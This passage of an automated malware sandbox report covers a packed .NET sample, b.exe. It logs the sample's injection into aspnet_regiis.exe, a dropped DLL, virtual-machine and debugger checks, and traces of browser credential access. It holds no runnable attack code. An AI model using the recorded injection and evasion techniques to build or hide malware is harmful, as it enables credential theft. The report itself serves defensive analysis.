            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 024483F0 appears 39 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 024590C0 appears 58 times
            Source: C:\Users\user\Desktop\b.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7648 -s 1228
            Source: b.exe, 00000000.00000000.1696067106.0000000000912000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRubyLiamViolet.zYOfT vs b.exe
            Source: b.exe, 00000000.00000002.1952651431.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs b.exe
            Source: b.exeBinary or memory string: OriginalFilenameRubyLiamViolet.zYOfT vs b.exe
            Source: b.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: b.exeStatic PE information: Section: m@ka ZLIB complexity 1.0003175535402098
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/7@2/2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0247AAE0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,2_2_0247AAE0
            Source: C:\Users\user\Desktop\b.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to behavior
            Source: C:\Users\user\Desktop\b.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7656:120:WilError_03
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7648
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\408c72f2-ef52-49a9-932d-7df56a1baaddJump to behavior
            Source: b.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\Users\user\Desktop\b.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: aspnet_regiis.exe, 00000002.00000003.1804566888.0000000004DB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: b.exeReversingLabs: Detection: 26%
            Source: b.exeVirustotal: Detection: 30%
            Source: b.exeString found in binary or memory: -addpset
            Source: b.exeString found in binary or memory: -addfulltrust
            Source: b.exeString found in binary or memory: -addgroup
            Source: b.exeString found in binary or memory: -help
            Source: C:\Users\user\Desktop\b.exeFile read: C:\Users\user\Desktop\b.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\b.exe "C:\Users\user\Desktop\b.exe"
            Source: C:\Users\user\Desktop\b.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\b.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
            Source: C:\Users\user\Desktop\b.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7648 -s 1228
            Source: C:\Users\user\Desktop\b.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
            Source: C:\Users\user\Desktop\b.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\b.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\b.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\b.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\b.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\b.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\b.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\b.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\b.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\b.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\b.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\b.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\b.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\b.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\b.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\b.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: b.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: b.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbLIST source: b.exe, 00000000.00000002.1952651431.0000000001078000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\Desktop\b.PDB source: b.exe, 00000000.00000002.1952651431.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: b.exe, 00000000.00000002.1952651431.000000000105E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: b.exe, 00000000.00000002.1952651431.000000000106E000.00000004.00000020.00020000.00000000.sdmp, WER95AE.tmp.dmp.5.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: b.exe, 00000000.00000002.1952651431.0000000001049000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdb source: WER95AE.tmp.dmp.5.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl, source: b.exe, 00000000.00000002.1952651431.0000000001078000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: n0C:\Windows\mscorlib.pdb source: b.exe, 00000000.00000002.1952543615.0000000000CFA000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: b.exe, 00000000.00000002.1952651431.0000000001019000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Desktop\b.PDBD{ source: b.exe, 00000000.00000002.1952543615.0000000000CFA000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WER95AE.tmp.dmp.5.dr

            Data Obfuscation

            barindex
            Source: C:\Users\user\Desktop\b.exeUnpacked PE file: 0.2.b.exe.860000.0.unpack m@ka:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
            Source: b.exeStatic PE information: section name: m@ka
            Source: b.exeStatic PE information: section name:
            Source: C:\Users\user\Desktop\b.exeCode function: 0_2_008674E2 push esi; iretd 0_2_008674E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_3_028CCF2F push 68028CCFh; iretd 2_3_028CCF6D
            Source: b.exeStatic PE information: section name: m@ka entropy: 7.999658471887131
            Source: C:\Users\user\Desktop\b.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to dropped file
            Source: C:\Users\user\Desktop\b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: Process Memory Space: b.exe PID: 7648, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Users\user\Desktop\b.exeMemory allocated: 2A30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\b.exeMemory allocated: 2BF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\b.exeMemory allocated: 2A30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\b.exeMemory allocated: 5270000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\b.exeMemory allocated: 6270000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\b.exeMemory allocated: 63A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\b.exeMemory allocated: 73A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\b.exeMemory allocated: 76F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\b.exeMemory allocated: 86F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\b.exeMemory allocated: 96F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 7756Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: Amcache.hve.5.drBinary or memory string: VMware
            Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
            Source: aspnet_regiis.exe, 00000002.00000002.1925078989.000000000289C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1924361265.000000000289C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
            Source: aspnet_regiis.exe, 00000002.00000002.1925078989.00000000028CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1924361265.00000000028CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWq
            Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000002.00000002.1925078989.00000000028CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1924361265.00000000028CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.5.drBinary or memory string: vmci.sys
            Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.5.drBinary or memory string: VMware20,1
            Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\b.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\b.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0247FAC0 LdrInitializeThunk,2_2_0247FAC0
            Source: C:\Users\user\Desktop\b.exeCode function: 0_2_6CDE160A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CDE160A
            Source: C:\Users\user\Desktop\b.exeCode function: 0_2_6CDE2D95 mov eax, dword ptr fs:[00000030h]0_2_6CDE2D95
            Source: C:\Users\user\Desktop\b.exeCode function: 0_2_6CDE3F69 mov eax, dword ptr fs:[00000030h]0_2_6CDE3F69
            Source: C:\Users\user\Desktop\b.exeCode function: 0_2_6CDE5B7C GetProcessHeap,0_2_6CDE5B7C
            Source: C:\Users\user\Desktop\b.exeCode function: 0_2_6CDE1131 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6CDE1131
            Source: C:\Users\user\Desktop\b.exeCode function: 0_2_6CDE160A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CDE160A
            Source: C:\Users\user\Desktop\b.exeCode function: 0_2_6CDE3F9A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CDE3F9A
            Source: C:\Users\user\Desktop\b.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\b.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2440000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\b.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2440000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\b.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2440000Jump to behavior
            Source: C:\Users\user\Desktop\b.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2441000Jump to behavior
            Source: C:\Users\user\Desktop\b.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2484000Jump to behavior
            Source: C:\Users\user\Desktop\b.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2487000Jump to behavior
            Source: C:\Users\user\Desktop\b.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2498000Jump to behavior
